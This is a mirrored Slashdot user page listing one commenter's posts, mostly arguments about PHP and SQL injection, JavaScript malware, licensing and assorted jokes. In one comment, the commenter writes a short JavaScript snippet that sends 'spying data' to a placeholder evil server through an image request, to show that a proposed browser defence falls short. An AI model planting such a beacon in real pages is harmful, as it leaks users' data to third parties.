Slashdot Mirror


User: Goaway

Goaway's activity in the archive.

Stories
0
Comments
4,507
First seen
Last seen
Profile
(view on slashdot.org)

Comments · 4,507

  1. Re:Simple fix to an obvious problem on JavaScript Malware Open The Door to the Intranet · · Score: 2, Insightful

    Even if people should ignore the fact that this breaks half the pages on the internet, and turn it on, I can just use an iframe for the attack instead. Or a style tag. And so on, and so on.

  2. Re:A solution to this problem. on JavaScript Malware Open The Door to the Intranet · · Score: 2, Insightful

    Except that, you know, maybe they want to actually use JavaScript apps on their intranet?

  3. Re:Simple fix to an obvious problem on JavaScript Malware Open The Door to the Intranet · · Score: 4, Insightful

    document.createElement("img");
    img.src="http://myevilserver.com/phonehome.cgi?evi lspyingdata="+encodeURIComponent(evilspyingdata);
    document.body.appendElement(img);


    Oops! I just phoned home without using XMLHttpRequest! How are you going to firewall that one out?

  4. Re:No Public Domain on Google Announces Open Source Repository · · Score: 1

    It doesn't reflect on you at all, they can strip your name from the code, there is no obligation to credit you. They might not do this, but they can, and most will (human nature does lean this way as a rule).

    How do you get from "somebody could theoretically take my code and claim it as their own" to "it does not reflect on me at all"? The first scenario is very unlikely to ever happen, and even if it does, it still doesn't affect me negatively in any way. As others pointed out, I could amuse myself by heckling whoever did it, or I could just ignore them, but in neither case are there any negative consequences for me. It is only if you contrive to let your pride be hurt that there is any problem, and I see no reason to do that.

    And once again, the vast majority of people would credit me just as much as they would with a GPL license or what have you. And that would include those who would not use my code in the first place if it was GPL'd.

  5. Re:No Public Domain on Google Announces Open Source Repository · · Score: 2, Insightful

    Public domain isn't the same as open source, open source means the developers retain rights, public domain means you give them all up, public domain can be taken by a stranger and made proprietary, is that really what you want? I suggest you have a little think on that issue.

    I'm not the poster you were replying to, but yes, that is exactly what I want when I release my software as public domain. I do not envy others their success if they want to use my code. No matter how propietary their use of it is, that does not lessen the value of the existing code one bit, and only reflects positively on myself.

    SQLite is a project that is released completely free into the public domain, and it has been massively successful, and has been taken up in any number of both open source and propietary projects. It's even running in the internals of Mac OS X. This would not have happened if it was encumbered by a GPL license.

  6. Re:but..? on Writing on Standing Water · · Score: 1

    Oh hooray for Slashdot being a useless piece of shit and stripping out foreign characters, ruining my "joke".

  7. Re:but..? on Writing on Standing Water · · Score: 1

    Only you culturally-ignorant Americans would say something like that!

    In Japanese, it's "wwwwwwwwwwwwwwwwkwwwwwww".

  8. Re:Nothing like FUD... on Game Addiction Clinic Swamped · · Score: 1

    "Kowledge transfer", eh? All right, I'll make sure to look that up.

  9. Re:Nothing like FUD... on Game Addiction Clinic Swamped · · Score: 1, Troll

    Hahahah, calling someone's bullshit is "-1, Troll" now?

  10. Re:Linux is not a silver bullet. on Why Popular Anti-Virus Apps 'Don't Work' · · Score: 1

    >> * Send out spam
    > Tricky. You would need to:
    > - invoke the mail program
    > - get the target email address from somewhere
    > - inject the spam into the mailer from somewhere
    >
    > The first is possible, the second two would probably involve some sort of network callback to your website to
    > provide the data. Not really sure you can do this in such a small program space, but ok, maybe.

    You really haven't got the slightest clue how spam is sent these days, do you? It's pretty much all done by zombie machines. You get an executable running on a compromised machine, and it reports home, and then waits for instructions. There's zero protection against this in Linux, running as root or a normal user. Windows at least has application firewalls that can warn you when new programs attempt to access the network, but no such luck for Linux.

    There's no need to invoke any mailers when you can just access the netword directly. And I'm not sure where your "such a small program space" comment comes from - who said anything about program sizes?

  11. Re:Nothing like FUD... on Game Addiction Clinic Swamped · · Score: 1, Insightful

    Ok, so tell me the name of the Dutch political candidate or party who benefits from this news article.

  12. Re:Nothing like FUD... on Game Addiction Clinic Swamped · · Score: 2, Insightful

    The jump from "enrolls people from the US" to "it's all US political games!" is completely logical to you, then?

  13. Re:The star is 1,950 light years away? on Astronomers Awaiting 1a Supernova · · Score: 1

    And why exactly do you think the harmful effects would move at half the speed of light?

  14. Re:Nothing like FUD... on Game Addiction Clinic Swamped · · Score: 1, Interesting

    Good job getting a political dig into a discussion about something happening in a completely different country!

  15. What's a "furby"? on Congress vs Misleading Meta Tags · · Score: 0, Offtopic

    Kids these days with their "furbies" and "walkmans", get offa my lawn!

  16. Re:How difficult is it. on SQL Injection Attacks Increasing · · Score: 1

    No, the problem is that PHP puts an API that is insecure by design right in front of developers, and then hides the ones that actually work like they're supposed to way out of sight. Meaning hardly anybody ever sees past what is right in front of them, and that works. It's insecure, but they don't know that, and they have no reason to distrust the language and tutorials they have been given.

    The only way to get PHP secure is to rip out the mysql functions completely, and offer no way to enable them again. Force people to go out and find the real database interfaces.

    Not going to happen, though.

  17. Re:How difficult is it. on SQL Injection Attacks Increasing · · Score: 1

    That's how all language except PHP (or at least PHP's default interface) work, right now, and have worked for years and years.

  18. Re:Hooray for PHP! on SQL Injection Attacks Increasing · · Score: 1

    That's why I included the "sql php" and "sql perl" searches at the top. Searching for just "php" will include every page which is written in PHP!

    Look again at my original post. There are double the amount of pages talking about SQL in PHP than talking about SQL in Perl. However, there are NINE times the pages talking about SQL injection vulnerabilities in PHP than those talking about SQL injection vulnerabilities in Perl.

  19. Re:How difficult is it. on SQL Injection Attacks Increasing · · Score: 3, Informative

    You've never used Perl's or Python's database interfaces, have you? You use placeholders, and pass in values separately, and the interface itself takes care of proper escaping. You use a constant string for your query and don't build the SQL query by hand.

    It is both easier, and much more secure.

  20. Re:How difficult is it. on SQL Injection Attacks Increasing · · Score: 1, Informative

    I am neither arguing for Perl in particular - Python and Ruby have pretty much the exact same kind of database interface - nor does that kind of interface stop you from manually constructing your own queries. However, you will have no reason whatsoever to do this, because the proper interface with automatic escaping is much less of a pain to use than constructing your queries by hand.

    If you're such a hot-shot programmer, why are you using PHP in the first place? Why not write lightning-fast code in C instead? If you're trading speed for convenience by using a high-level language, why wouldn't you want to use something that is even more convenient? And, I might add, faster in many instances?

  21. Re:Hooray for PHP! on SQL Injection Attacks Increasing · · Score: 0

    The API is the language. Claiming otherwise is silly semantic games with no connection to the reality of the situation, which is: There are a million scripts out there with SQL injection vulnerabilities, and most of them will be written in PHP, because PHP encourages (by not actively discouraging) you to write insecure code.

  22. Re:Hooray for PHP! on SQL Injection Attacks Increasing · · Score: 1

    You are arguing semantics. The end result of the current state of PHP is: There are a huge amount of scripts out there that are vulenarable to SQL injection, that would not be vulnerable if they were written in another language, because that other language would provide safer mechanisms and encourage their use.

  23. Re:Hooray for PHP! on SQL Injection Attacks Increasing · · Score: 2, Interesting

    Of course it's the job of the language to make it as easy as possible to write secure code, and as hard as possible to write insecure code. That should be blindingly obvious, especially for a language that's pretty much aimed at people with little programming experience who are likely to have no idea what they're doing.

  24. Re:Hooray for PHP! on SQL Injection Attacks Increasing · · Score: 1

    Perl does. Python does. I'm pretty sure Ruby does. I'm told there are several modules for PHP that do.

    SQL injection is only a problem in PHP because PHP does it all wrong by default.

  25. Re:Hard for Devs? on SQL Injection Attacks Increasing · · Score: 1

    Perl does. Python does. I'm pretty sure Ruby does.

    Pretty much every language except PHP does. PHP has several modules to do this the right way too, I'm told, but nobody even knows about them.

    SQL injection is only a problem because PHP does things in the worst way possible.